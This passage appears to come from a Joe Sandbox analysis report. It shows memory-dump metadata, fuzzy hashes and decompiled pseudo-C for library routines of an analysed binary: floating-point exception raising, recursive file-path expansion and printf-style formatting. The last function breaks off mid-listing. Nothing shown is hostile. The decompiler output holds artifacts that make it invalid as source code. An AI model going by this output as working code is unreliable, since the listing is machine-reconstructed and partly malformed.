0x013bcbbe
0x013bcbc1
0x013bcbc4
0x013bcb84
0x013bcb84
0x013bcb87
0x00000000
0x00000000
0x013bcb87
0x013bcb82
0x013bcbcb
0x013bcbcb
0x013bcbcc
0x013bcb14
0x013bcb14
0x013bcb16
0x00000000
0x00000000
0x013bcb16
0x013bcbcf
0x013bcbdc
0x013bcbdf
0x013bcbe2
0x013bcbe6
0x013bcbe7
0x013bcbea
0x013bcbed
0x013bcbf3
0x013bcbf4
0x013bcbf7
0x013bcbfa
0x013bcbfd
0x013bcbfd
0x013bc9f2
0x013bcc08
0x013bcc0b
0x013bcc0c
0x013bcc0e
0x013bcc10
0x013bcc15
0x013bcc20
0x013bcc20
0x013bcc26
0x013bcc29
0x013bcc2a
0x013bcc2a
0x013bcc20
0x013bcc2e
0x013bcc30
0x013bcc32
0x013bcc34
0x013bcc34
0x013bcc38
0x00000000
0x00000000
0x013bcc3a
0x013bcc3a
0x013bcc3d
0x013bcc3f
0x00000000
0x00000000
0x00000000
0x013bcc3f
0x013bcc34
0x013bcc41
0x013bcc4c
0x013bcc4c
0x013bc95e
0x013bc7fc
0x013bc7fc
0x013bc7fc
0x013bc7ff
0x013bc805
0x013bc836
0x013bc838
0x013bc87a
0x013bc87c
0x013bc883
0x013bc88a
0x013bc88d
0x013bc890
0x013bc892
0x013bc892
0x013bc893
0x013bc896
0x013bc8a0
0x013bc8aa
0x013bc8af
0x013bc8b2
0x013bc8b4
0x013bc8b7
0x013bc8c0
0x013bc8c3
0x013bc8c6
0x013bc8c9
0x013bc8cf
0x013bc8d2
0x013bc8d5
0x013bc8d5
0x013bc8d5
0x013bc8da
0x013bc8da
0x013bc8e5
0x013bc8f0
0x013bc8f3
0x013bc8ff
0x013bc904
0x013bc90f
0x013bc911
0x013bc913
0x013bc919
0x013bc91e
0x013bc920
0x013bc926
0x013bc83a
0x013bc845
0x013bc848
0x013bc854
0x013bc856
0x013bc85d
0x013bc85f
0x013bc867
0x013bc869
0x013bc86b
0x013bc870
0x013bc873
0x013bc879
0x013bc879
0x013bc807
0x013bc815
0x013bc821
0x013bc823
0x013bc835
0x013bc835
0x013bc805
0x013bc7f6
0x013bc7e5

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea1bca5746b0adb9e08df94ffaee08dd418248eedd968373390a1778903dda37
Instruction ID: 3957e172e776bb2a4522fe2b2b8574399b8e75ca331705645726ec40a8561ac8
Opcode Fuzzy Hash: ea1bca5746b0adb9e08df94ffaee08dd418248eedd968373390a1778903dda37
Instruction Fuzzy Hash: 51F11D71E002199BDF24CF6DC8C06EEBBB1FF88318F158269D915A7745E731A941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013C15B2 Relevance: 1.8, APIs: 1, Instructions: 274
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E013C15B2(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed char _t193;
				signed int _t196;
				signed int _t200;
				signed int _t203;
				void* _t204;
				void* _t207;
				signed int _t210;
				void* _t211;
				signed int _t226;
				unsigned int* _t241;
				signed char _t243;
				signed int* _t251;
				unsigned int* _t257;
				signed int* _t258;
				signed char _t260;
				long _t263;
				signed int* _t266;

				 *(_a4 + 4) = 0;
				_t263 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t243 = _a12;
				if((_t243 & 0x00000010) != 0) {
					_t263 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t243 & 0x00000002) != 0) {
					_t263 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t243 & 0x00000001) != 0) {
					_t263 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t243 & 0x00000004) != 0) {
					_t263 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t243 & 0x00000008) != 0) {
					_t263 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t266 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
				_t260 = E013BF06B(_a4);
				if((_t260 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t260 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t260 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t260 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t260 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t266 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffd | 1;
						L26:
						 *_t258 = _t226;
						L29:
						_t175 =  *_t266 & 0x00000300;
						if(_t175 == 0) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
							L35:
							 *_t251 = _t178;
							L36:
							_t179 = _a4;
							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t255 = _a4;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t241;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t241;
							}
							E013BEFD7(_t255);
							RaiseException(_t263, 0, 1,  &_a4);
							_t257 = _a4;
							_t193 = _t257[2];
							if((_t193 & 0x00000010) != 0) {
								 *_t266 =  *_t266 & 0xfffffffe;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000008) != 0) {
								 *_t266 =  *_t266 & 0xfffffffb;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000004) != 0) {
								 *_t266 =  *_t266 & 0xfffffff7;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000002) != 0) {
								 *_t266 =  *_t266 & 0xffffffef;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000001) != 0) {
								 *_t266 =  *_t266 & 0xffffffdf;
							}
							_t196 =  *_t257 & 0x00000003;
							if(_t196 == 0) {
								 *_t266 =  *_t266 & 0xfffff3ff;
							} else {
								_t207 = _t196 - 1;
								if(_t207 == 0) {
									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t266 = _t210;
									L58:
									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
									if(_t200 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t266 = _t203;
										L65:
										if(_a28 == 0) {
											 *_t241 = _t257[0x14];
										} else {
											 *_t241 = _t257[0x14];
										}
										return _t203;
									}
									_t204 = _t200 - 1;
									if(_t204 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t203 = _t204 - 1;
									if(_t203 == 0) {
										 *_t266 =  *_t266 & 0xfffff3ff;
									}
									goto L65;
								}
								_t211 = _t207 - 1;
								if(_t211 == 0) {
									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t211 == 1) {
									 *_t266 =  *_t266 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x013c15c0
0x013c15c7
0x013c15cc
0x013c15d2
0x013c15d5
0x013c15db
0x013c15e0
0x013c15e5
0x013c15e5
0x013c15eb
0x013c15f0
0x013c15f5
0x013c15f5
0x013c15fc
0x013c1601
0x013c1606
0x013c1606
0x013c160d
0x013c1612
0x013c1617
0x013c1617
0x013c161e
0x013c1623
0x013c1628
0x013c1628
0x013c1630
0x013c1640
0x013c1652
0x013c1664
0x013c1677
0x013c1689
0x013c1691
0x013c1696
0x013c169b
0x013c169b
0x013c16a2
0x013c16a7
0x013c16a7
0x013c16ae
0x013c16b3
0x013c16b3
0x013c16ba
0x013c16bf
0x013c16bf
0x013c16c6
0x013c16cb
0x013c16cb
0x013c16d5
0x013c16d7
0x013c1711
0x013c16d9
0x013c16de
0x013c1702
0x013c170a
0x013c16fe
0x013c16fe
0x013c1714
0x013c171b
0x013c171d
0x013c173f
0x013c1747
0x013c174a
0x013c174a
0x013c174c
0x013c174c
0x013c1757
0x013c175d
0x013c1762
0x013c1769
0x013c17a3
0x013c17ae
0x013c17b4
0x013c17b7
0x013c17ba
0x013c17c6
0x013c17ce
0x013c176b
0x013c176e
0x013c177a
0x013c1780
0x013c1786
0x013c1789
0x013c1792
0x013c1792
0x013c17d1
0x013c17df
0x013c17e5
0x013c17e8
0x013c17ed
0x013c17ef
0x013c17f2
0x013c17f2
0x013c17f7
0x013c17f9
0x013c17fc
0x013c17fc
0x013c1801
0x013c1803
0x013c1806
0x013c1806
0x013c180b
0x013c180d
0x013c1810
0x013c1810
0x013c1815
0x013c1817
0x013c1817
0x013c1824
0x013c1827
0x013c185e
0x013c1829
0x013c1829
0x013c182c
0x013c1857
0x013c184c
0x013c184c
0x013c1860
0x013c1868
0x013c186b
0x013c188a
0x013c188f
0x013c188f
0x013c1891
0x013c1896
0x013c18a2
0x013c1898
0x013c189b
0x013c189b
0x013c18a7
0x013c18a7
0x013c186d
0x013c1870
0x013c187f
0x00000000
0x013c187f
0x013c1872
0x013c1875
0x013c1877
0x013c1877
0x00000000
0x013c1875
0x013c182e
0x013c1831
0x013c1847
0x00000000
0x013c1847
0x013c1836
0x013c1838
0x013c1838
0x013c1836
0x00000000
0x013c1827
0x013c1724
0x013c1732
0x013c173a
0x00000000
0x013c173a
0x013c1728
0x013c172d
0x013c172d
0x00000000
0x013c1728
0x013c16e5
0x013c16f3
0x013c16fb
0x00000000
0x013c16fb
0x013c16e9
0x013c16ee
0x013c16ee
0x013c16e9

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,013C15AD,?,?,00000008,?,?,013C1245,00000000), ref: 013C17DF

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 129fbf3fbec2c87435a54d21ee7b59f92230a123665df072c546d3abd110a222
Instruction ID: 61759f86b3013ba2215298cf5ac7b59d75457c71fd1f591ab2edb990190ac497
Opcode Fuzzy Hash: 129fbf3fbec2c87435a54d21ee7b59f92230a123665df072c546d3abd110a222
Instruction Fuzzy Hash: C7B14D35610608CFE719CF2CC486A657FA0FF45768F29865CE99ACF2A2C335E951DB40

Uniqueness

Uniqueness Score: -1.00%

Function 013B8E50 Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E013B8E50(void* __ecx, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				union _FINDEX_INFO_LEVELS _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				signed int _v48;
				struct _WIN32_FIND_DATAW _v604;
				char _v605;
				intOrPtr* _v612;
				union _FINDEX_INFO_LEVELS _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				signed int _v628;
				union _FINDEX_INFO_LEVELS _v632;
				union _FINDEX_INFO_LEVELS _v636;
				signed int _v640;
				signed int _v644;
				union _FINDEX_INFO_LEVELS _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				signed int _v664;
				union _FINDEX_INFO_LEVELS _v668;
				union _FINDEX_INFO_LEVELS _v672;
				void* __ebx;
				void* __edi;
				intOrPtr _t68;
				signed int _t73;
				signed int _t75;
				char _t77;
				signed char _t78;
				signed int _t84;
				signed int _t94;
				signed int _t97;
				union _FINDEX_INFO_LEVELS _t98;
				union _FINDEX_INFO_LEVELS _t100;
				intOrPtr* _t106;
				signed int _t109;
				intOrPtr _t116;
				signed int _t118;
				signed int _t121;
				signed int _t123;
				void* _t126;
				union _FINDEX_INFO_LEVELS _t127;
				void* _t128;
				intOrPtr* _t130;
				intOrPtr* _t133;
				signed int _t135;
				intOrPtr* _t138;
				signed int _t143;
				signed int _t149;
				void* _t155;
				signed int _t158;
				intOrPtr _t160;
				void* _t161;
				void* _t165;
				void* _t166;
				signed int _t167;
				signed int _t170;
				void* _t171;
				signed int _t172;
				void* _t173;
				void* _t174;

				_push(__ecx);
				_t133 = _a4;
				_t2 = _t133 + 1; // 0x1
				_t155 = _t2;
				do {
					_t68 =  *_t133;
					_t133 = _t133 + 1;
				} while (_t68 != 0);
				_t158 = _a12;
				_t135 = _t133 - _t155 + 1;
				_v8 = _t135;
				if(_t135 <=  !_t158) {
					_push(__esi);
					_t5 = _t158 + 1; // 0x1
					_t126 = _t5 + _t135;
					_t165 = E013B675E(_t126, 1);
					__eflags = _t158;
					if(_t158 == 0) {
						L7:
						_push(_v8);
						_t126 = _t126 - _t158;
						_t73 = E013BE9B1(_t165 + _t158, _t126, _a4);
						_t172 = _t171 + 0x10;
						__eflags = _t73;
						if(_t73 != 0) {
							goto L12;
						} else {
							_t130 = _a16;
							_t118 = E013B924B(_t130);
							_v8 = _t118;
							__eflags = _t118;
							if(_t118 == 0) {
								 *( *(_t130 + 4)) = _t165;
								_t167 = 0;
								_t14 = _t130 + 4;
								 *_t14 =  *(_t130 + 4) + 4;
								__eflags =  *_t14;
							} else {
								E013B67BB(_t165);
								_t167 = _v8;
							}
							E013B67BB(0);
							_t121 = _t167;
							goto L4;
						}
					} else {
						_push(_t158);
						_t123 = E013BE9B1(_t165, _t126, _a8);
						_t172 = _t171 + 0x10;
						__eflags = _t123;
						if(_t123 != 0) {
							L12:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E013B4FA2();
							asm("int3");
							_t170 = _t172;
							_t173 = _t172 - 0x298;
							_t75 =  *0x13ca014; // 0xfcb69da6
							_v48 = _t75 ^ _t170;
							_t138 = _v32;
							_t156 = _v28;
							_push(_t126);
							_push(0);
							_t160 = _v36;
							_v648 = _t156;
							__eflags = _t138 - _t160;
							if(_t138 != _t160) {
								while(1) {
									_t116 =  *_t138;
									__eflags = _t116 - 0x2f;
									if(_t116 == 0x2f) {
										break;
									}
									__eflags = _t116 - 0x5c;
									if(_t116 != 0x5c) {
										__eflags = _t116 - 0x3a;
										if(_t116 != 0x3a) {
											_t138 = E013BEA00(_t160, _t138);
											__eflags = _t138 - _t160;
											if(_t138 != _t160) {
												continue;
											}
										}
									}
									break;
								}
								_t156 = _v612;
							}
							_t77 =  *_t138;
							_v605 = _t77;
							__eflags = _t77 - 0x3a;
							if(_t77 != 0x3a) {
								L23:
								_t127 = 0;
								__eflags = _t77 - 0x2f;
								if(__eflags == 0) {
									L26:
									_t78 = 1;
								} else {
									__eflags = _t77 - 0x5c;
									if(__eflags == 0) {
										goto L26;
									} else {
										__eflags = _t77 - 0x3a;
										_t78 = 0;
										if(__eflags == 0) {
											goto L26;
										}
									}
								}
								_v672 = _t127;
								_v668 = _t127;
								_push(_t165);
								asm("sbb eax, eax");
								_v664 = _t127;
								_v660 = _t127;
								_v640 =  ~(_t78 & 0x000000ff) & _t138 - _t160 + 0x00000001;
								_v656 = _t127;
								_v652 = _t127;
								_t84 = E013B8C44(_t138 - _t160 + 1, _t160,  &_v672, E013B9158(_t156, __eflags));
								_t174 = _t173 + 0xc;
								asm("sbb eax, eax");
								_t166 = FindFirstFileExW( !( ~_t84) & _v664, _t127,  &_v604, _t127, _t127, _t127);
								__eflags = _t166 - 0xffffffff;
								if(_t166 != 0xffffffff) {
									_t143 =  *((intOrPtr*)(_v612 + 4)) -  *_v612;
									__eflags = _t143;
									_t144 = _t143 >> 2;
									_v644 = _t143 >> 2;
									do {
										_v636 = _t127;
										_v632 = _t127;
										_v628 = _t127;
										_v624 = _t127;
										_v620 = _t127;
										_v616 = _t127;
										_t94 = E013B8B75( &(_v604.cFileName),  &_v636,  &_v605, E013B9158(_t156, __eflags));
										_t174 = _t174 + 0x10;
										asm("sbb eax, eax");
										_t97 =  !( ~_t94) & _v628;
										__eflags =  *_t97 - 0x2e;
										if( *_t97 != 0x2e) {
											L34:
											_push(_v612);
											_t98 = E013B8E50(_t144, _t166, _t97, _t160, _v640);
											_t174 = _t174 + 0x10;
											_v648 = _t98;
											__eflags = _t98;
											if(_t98 != 0) {
												__eflags = _v616 - _t127;
												if(_v616 != _t127) {
													E013B67BB(_v628);
													_t98 = _v648;
												}
												_t127 = _t98;
											} else {
												goto L35;
											}
										} else {
											_t144 =  *((intOrPtr*)(_t97 + 1));
											__eflags = _t144;
											if(_t144 == 0) {
												goto L35;
											} else {
												__eflags = _t144 - 0x2e;
												if(_t144 != 0x2e) {
													goto L34;
												} else {
													__eflags =  *((intOrPtr*)(_t97 + 2)) - _t127;
													if( *((intOrPtr*)(_t97 + 2)) == _t127) {
														goto L35;
													} else {
														goto L34;
													}
												}
											}
										}
										L43:
										FindClose(_t166);
										goto L44;
										L35:
										__eflags = _v616 - _t127;
										if(_v616 != _t127) {
											E013B67BB(_v628);
											_pop(_t144);
										}
										__eflags = FindNextFileW(_t166,  &_v604);
									} while (__eflags != 0);
									_t106 = _v612;
									_t149 = _v644;
									_t156 =  *_t106;
									_t109 =  *((intOrPtr*)(_t106 + 4)) -  *_t106 >> 2;
									__eflags = _t149 - _t109;
									if(_t149 != _t109) {
										E013BE410(_t156, _t156 + _t149 * 4, _t109 - _t149, 4, E013B8AAB);
									}
									goto L43;
								} else {
									_push(_v612);
									_t127 = E013B8E50( &_v604, _t166, _t160, _t127, _t127);
								}
								L44:
								__eflags = _v652;
								_pop(_t165);
								if(_v652 != 0) {
									E013B67BB(_v664);
								}
								_t100 = _t127;
							} else {
								__eflags = _t138 - _t160 + 1;
								if(_t138 == _t160 + 1) {
									_t77 = _v605;
									goto L23;
								} else {
									_push(_t156);
									_t100 = E013B8E50(_t138, _t165, _t160, 0, 0);
								}
							}
							_pop(_t161);
							__eflags = _v12 ^ _t170;
							_pop(_t128);
							return E013B1EDB(_t100, _t128, _v12 ^ _t170, _t156, _t161, _t165);
						} else {
							goto L7;
						}
					}
				} else {
					_t121 = 0xc;
					L4:
					return _t121;
				}
			}

0x013b8e55
0x013b8e56
0x013b8e59
0x013b8e59
0x013b8e5c
0x013b8e5c
0x013b8e5e
0x013b8e5f
0x013b8e64
0x013b8e6b
0x013b8e6e
0x013b8e73
0x013b8e7c
0x013b8e7d
0x013b8e80
0x013b8e8a
0x013b8e8e
0x013b8e90
0x013b8ea4
0x013b8ea4
0x013b8ea7
0x013b8eb1
0x013b8eb6
0x013b8eb9
0x013b8ebb
0x00000000
0x013b8ebd
0x013b8ebd
0x013b8ec2
0x013b8ec9
0x013b8ecc
0x013b8ece
0x013b8edf
0x013b8ee1
0x013b8ee3
0x013b8ee3
0x013b8ee3
0x013b8ed0
0x013b8ed1
0x013b8ed6
0x013b8ed9
0x013b8ee8
0x013b8eee
0x00000000
0x013b8ef1
0x013b8e92
0x013b8e92
0x013b8e98
0x013b8e9d
0x013b8ea0
0x013b8ea2
0x013b8ef4
0x013b8ef6
0x013b8ef7
0x013b8ef8
0x013b8ef9
0x013b8efa
0x013b8efb
0x013b8f00
0x013b8f04
0x013b8f06
0x013b8f0c
0x013b8f13
0x013b8f16
0x013b8f19
0x013b8f1c
0x013b8f1d
0x013b8f1e
0x013b8f21
0x013b8f27
0x013b8f29
0x013b8f2b
0x013b8f2b
0x013b8f2d
0x013b8f2f
0x00000000
0x00000000
0x013b8f31
0x013b8f33
0x013b8f35
0x013b8f37
0x013b8f42
0x013b8f44
0x013b8f46
0x00000000
0x00000000
0x013b8f46
0x013b8f37
0x00000000
0x013b8f33
0x013b8f48
0x013b8f48
0x013b8f4e
0x013b8f50
0x013b8f56
0x013b8f58
0x013b8f7a
0x013b8f7a
0x013b8f7c
0x013b8f7e
0x013b8f8a
0x013b8f8a
0x013b8f80
0x013b8f80
0x013b8f82
0x00000000
0x013b8f84
0x013b8f84
0x013b8f86
0x013b8f88
0x00000000
0x00000000
0x013b8f88
0x013b8f82
0x013b8f92
0x013b8f9a
0x013b8fa0
0x013b8fa1
0x013b8fa3
0x013b8fab
0x013b8fb1
0x013b8fb7
0x013b8fbd
0x013b8fd1
0x013b8fd6
0x013b8fe1
0x013b8ff7
0x013b8ff9
0x013b8ffc
0x013b901f
0x013b901f
0x013b9021
0x013b9024
0x013b902a
0x013b902a
0x013b9030
0x013b9036
0x013b903c
0x013b9042
0x013b9048
0x013b9069
0x013b906e
0x013b9073
0x013b9077
0x013b907d
0x013b9080
0x013b9093
0x013b9093
0x013b90a1
0x013b90a6
0x013b90a9
0x013b90af
0x013b90b1
0x013b910f
0x013b9115
0x013b911d
0x013b9122
0x013b9128
0x013b9129
0x00000000
0x00000000
0x00000000
0x013b9082
0x013b9082
0x013b9085
0x013b9087
0x00000000
0x013b9089
0x013b9089
0x013b908c
0x00000000
0x013b908e
0x013b908e
0x013b9091
0x00000000
0x00000000
0x00000000
0x00000000
0x013b9091
0x013b908c
0x013b9087
0x013b912b
0x013b912c
0x00000000
0x013b90b3
0x013b90b3
0x013b90b9
0x013b90c1
0x013b90c6
0x013b90c6
0x013b90d5
0x013b90d5
0x013b90dd
0x013b90e3
0x013b90e9
0x013b90f0
0x013b90f3
0x013b90f5
0x013b9105
0x013b910a
0x00000000
0x013b8ffe
0x013b8ffe
0x013b900f
0x013b900f
0x013b9132
0x013b9132
0x013b9139
0x013b913a
0x013b9142
0x013b9147
0x013b9148
0x013b8f5a
0x013b8f5d
0x013b8f5f
0x013b8f74
0x00000000
0x013b8f61
0x013b8f61
0x013b8f67
0x013b8f6c
0x013b8f5f
0x013b914d
0x013b914e
0x013b9150
0x013b9157
0x00000000
0x00000000
0x00000000
0x013b8ea2
0x013b8e75
0x013b8e77
0x013b8e78
0x013b8e7a
0x013b8e7a

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8a06c367780db923cd661950012171433a846c7bd1efd86208bfbb3c38bd443
Instruction ID: c817e53057c1958a9c5e712450407c377295f4d4ccf86da20726e145b46b7244
Opcode Fuzzy Hash: f8a06c367780db923cd661950012171433a846c7bd1efd86208bfbb3c38bd443
Instruction Fuzzy Hash: 1941A4B5804219AEDB20DF6DCCC8AEABBBDEF45308F1442D9E61D93601E6359E848F50

Uniqueness

Uniqueness Score: -1.00%

Function 013B4364 Relevance: 1.5, Strings: 1, Instructions: 216
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E013B4364(intOrPtr* __ecx) {
				char _v6;
				char _v8;
				signed int _v12;
				void* __ebx;
				char _t51;
				signed int _t52;
				void* _t53;
				signed int _t54;
				signed char _t56;
				signed char _t58;
				signed int _t59;
				void* _t61;
				signed char _t66;
				signed char _t69;
				signed char _t76;
				signed char _t78;
				signed int _t80;
				signed int _t82;
				signed int _t83;
				unsigned int _t89;
				signed int _t90;
				signed int* _t91;
				void* _t93;
				signed int _t95;
				unsigned int _t97;
				signed char _t99;
				void* _t107;
				intOrPtr _t110;
				void* _t114;
				intOrPtr* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				void* _t123;

				_push(__ecx);
				_push(__ecx);
				_t117 = __ecx;
				_t93 = 0x58;
				_t51 =  *((char*)(__ecx + 0x31));
				_t122 = _t51 - 0x64;
				if(_t122 > 0) {
					__eflags = _t51 - 0x70;
					if(__eflags > 0) {
						_t52 = _t51 - 0x73;
						__eflags = _t52;
						if(_t52 == 0) {
							L9:
							_t53 = E013B4A66(_t117);
							L10:
							if(_t53 != 0) {
								__eflags =  *(_t117 + 0x30);
								if( *(_t117 + 0x30) != 0) {
									L70:
									_t54 = 1;
									L71:
									return _t54;
								}
								_t95 = 0;
								_v8 = 0;
								_v6 = 0;
								_t89 =  *(_t117 + 0x20);
								_v12 = 0;
								_t56 = _t89 >> 4;
								__eflags = 1 & _t56;
								if((1 & _t56) == 0) {
									L45:
									_t110 =  *((intOrPtr*)(_t117 + 0x31));
									__eflags = _t110 - 0x78;
									if(_t110 == 0x78) {
										L47:
										_t58 = _t89 >> 5;
										__eflags = _t58 & 0x00000001;
										if((_t58 & 0x00000001) == 0) {
											L49:
											_t90 = 0;
											__eflags = 0;
											L50:
											__eflags = _t110 - 0x61;
											if(_t110 == 0x61) {
												L53:
												_t59 = 1;
												L54:
												__eflags = _t90;
												if(_t90 != 0) {
													L56:
													 *((char*)(_t119 + _t95 - 4)) = 0x30;
													__eflags = _t110 - 0x58;
													if(_t110 == 0x58) {
														L59:
														0x78 = 0x58;
														L60:
														 *((char*)(_t119 + _t95 - 3)) = 0x78;
														_t95 = _t95 + 2;
														__eflags = _t95;
														_v12 = _t95;
														L61:
														_t91 = _t117 + 0x18;
														_t61 = _t117 + 0x448;
														_t114 =  *((intOrPtr*)(_t117 + 0x24)) -  *((intOrPtr*)(_t117 + 0x38)) - _t95;
														__eflags =  *(_t117 + 0x20) & 0x0000000c;
														if(( *(_t117 + 0x20) & 0x0000000c) == 0) {
															E013B3BFC(_t61, 0x20, _t114, _t91);
															_t95 = _v12;
															_t120 = _t120 + 0x10;
														}
														_push(_t117 + 0xc);
